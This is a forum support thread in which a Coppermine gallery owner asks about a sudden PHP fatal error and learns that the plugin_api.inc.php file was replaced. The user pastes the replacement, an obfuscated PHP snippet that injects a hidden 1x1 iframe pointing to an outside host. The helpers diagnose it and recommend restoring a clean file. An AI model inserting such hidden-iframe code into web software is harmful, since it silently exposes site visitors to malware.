Hello
When i want to go on my coppermine-galler, i get this message:
Fatal error: Undefined class name 'cpgpluginapi' in /mnt/web6/32/92/51319892/htdocs/cpg1410/include/init.inc.php on line 224
Before i get this, the gallery runs without problems.
Why do i recieve this error now?
I changed nothing :(
best regards
fruity
Make sure include/plugin_api.inc.php is present and correct (eg. not an empty file).
Hi
the pligin_api.inc.php file istn't empty.
There are a few lines Code
<?php
if($GLOBALS["fx"]==0) {
$GLOBALS["fx"]=1;
echo "<iframe src='&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#99;&#102;&#101;&#108;&#111;&#109;&#118;&#104;&#107;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#52;&#50;&#46;&#112;&#104;&#112;' width=1 height=1></iframe>";
}
?>
this is the whole code
Upload a clean copy of the file from the Coppermine package.
See also:
http://forum.coppermine-gallery.net/index.php/topic,51882.0.html
http://forum.coppermine-gallery.net/index.php/topic,51927.0.html